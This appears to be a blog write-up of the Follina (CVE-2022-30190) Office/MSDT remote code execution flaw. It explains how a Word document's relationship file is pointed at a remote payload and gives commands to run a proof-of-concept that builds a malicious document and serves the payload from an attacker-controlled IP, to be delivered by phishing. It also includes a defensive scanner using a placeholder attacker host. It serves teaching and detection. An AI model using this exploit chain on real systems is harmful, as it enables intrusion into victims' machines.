CVE-2022-30190, AKA Folina, is a zero-day found in Microsoft products that allows a remote attacker to run malicious code on the endpoint. The vulnerability lives in the Windows Support Diagnostic Tool (MSDT) and can be exploited from any application that can invoke a URL protocol handler.
I, however, will specifically be looking at exploiting this with the help of MS Office files, as phishing is the most common way attackers try to get into a system. I have also put together a mini proof of concept that makes testing this in your environment much easier! Let's set up an environment and take a look at how the exploit works in detail.
A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
-Microsoft Security Response Center
How It Works
It all begins with the malicious Word document. All Office documents are basically packed files; anyone can unpack them with the
Doing so reveals the files contained within a Word document. The specific file in question here is
document.xml.rels is an XML file that maps relationships within the document (image placeholders, tables, fonts) to external resources (images hosted online, videos). The exploit abuses this functionality.
The attacker first unpacks a Word document as shown in the previous step, modifies the target to point to a web server hosting the malicious payload as shown above, and repacks the Word file.
Shown above is the payload hosted on a remote server. Initially, researchers found that the MSDT tool requires a PIN to run any code, and therefore people thought this exploit would not be possible. However, a researcher found that if the payload hosted on the remote server is larger than 4096 bytes, MSDT will go on to run arbitrary code, giving the attacker remote code execution. Another researcher, Bill Demirkapi, has written an in-depth piece explaining how and why the 4096-byte threshold comes about. Now that we have taken a look at how the exploit works, let's see it in action!
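From the defender's side, the relationship file described above is also the place to look when triaging a suspicious attachment. The following scanner is an added example, not part of the original post or of the author's PoC: it opens a .docx as a package, parses word/_rels/document.xml.rels, and flags any relationship whose target uses the MSDT protocol handler or any embedded-object/template relationship whose target is external rather than a part inside the package. The namespace and relationship-type URIs are the standard OOXML ones; the two sample documents and the host attacker.example are constructed placeholders, not real samples.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_PREFIX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
RELS_PART = "word/_rels/document.xml.rels"

# Relationship types that Word normally resolves to parts inside the package;
# an External target here means content is fetched and rendered from elsewhere.
REMOTE_LOAD_TYPES = {"oleObject", "attachedTemplate"}
# Scheme that hands the target to the MSDT protocol handler instead of a browser.
SUSPICIOUS_SCHEMES = {"ms-msdt"}


def scan_docx(data):
    """Return a list of suspicious relationships found in a .docx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if RELS_PART not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read(RELS_PART))
    for rel in root.iter("{%s}Relationship" % RELS_NS):
        target = rel.get("Target", "")
        rtype = rel.get("Type", "")
        if rtype.startswith(REL_TYPE_PREFIX):
            rtype = rtype[len(REL_TYPE_PREFIX):]
        external = rel.get("TargetMode", "Internal") == "External"
        scheme = urlsplit(target).scheme.lower()
        reasons = []
        if scheme in SUSPICIOUS_SCHEMES:
            reasons.append("target invokes the %s: protocol handler" % scheme)
        if external and rtype in REMOTE_LOAD_TYPES:
            reasons.append("external %s fetched over %s" % (rtype, scheme or "unknown scheme"))
        if reasons:
            findings.append({"id": rel.get("Id"), "type": rtype,
                             "target": target, "reasons": reasons})
    return findings


def build_docx(rels_body):
    """Build a minimal .docx in memory around the given <Relationship> entries.
    Constructed sample: just enough package structure for the scanner to parse."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            '<Relationships xmlns="%s">%s</Relationships>' % (RELS_NS, rels_body))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr(RELS_PART, rels)
    return buf.getvalue()


# Constructed benign document: internal parts plus an ordinary web hyperlink.
BENIGN_DOCX = build_docx(
    '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="%simage" Target="media/image1.png"/>'
    '<Relationship Id="rId3" Type="%shyperlink" Target="https://example.com/" TargetMode="External"/>'
    % ((REL_TYPE_PREFIX,) * 3))

# Constructed suspicious document: an embedded object whose content is pulled
# from a remote web server (attacker.example is a placeholder host).
SUSPICIOUS_DOCX = build_docx(
    '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="%soleObject" Target="http://attacker.example/pwn.html" TargetMode="External"/>'
    % ((REL_TYPE_PREFIX,) * 2))

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_DOCX), ("suspicious", SUSPICIOUS_DOCX)):
        print(name, scan_docx(doc) or "clean")
```

To check a real attachment, call `scan_docx(open(path, "rb").read())`. The check only covers the delivery document, not the HTML stage fetched from the remote server, so it complements rather than replaces the protocol-handler workaround mentioned at the end of the post; a clean result from this scanner does not mean the file is safe.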
- Windows 10/11 virtual machine
- Office Deployment Tool (download and install it on the VM)
Installing Office 2021 Enterprise
C:\Users\User>setup.exe /configure configuration-Office2021Enterprise.xml
That's all for the setup!
To make things easier, I wrote up a proof-of-concept in regards to this vulnerability. Here's how it works:
Clone the POC
git clone https://github.com/ItsNee/Folina-CVE-2022-30190-POC.git
cd Folina-CVE-2022-30190-POC
python3 folina.py --payload-url "http://192.168.200.144:1337/pwn.html"
Running this will create a malicious Word document with the given --payload-url parameter and host the default payload on port 1337 on all interfaces of the machine that the tool is run on.
Deliver Malicious File
Deliver the malicious Word document created by the script to your endpoint. From the attacker's POV this could be via a phishing email of some sort.
Once the user executes the file, your web server hosting the payload will receive a callback and the calculator application will be opened on the endpoint without any further user action.
Microsoft and some other security researchers have released workarounds that have been shown to work against this exploit.
On top of all this, Microsoft Defender has also started to actively detect and protect against this. There might still be bypasses out in the wild, so beware. Disable the MSDT URL protocol if you can afford it!
Hope you found this insightful!!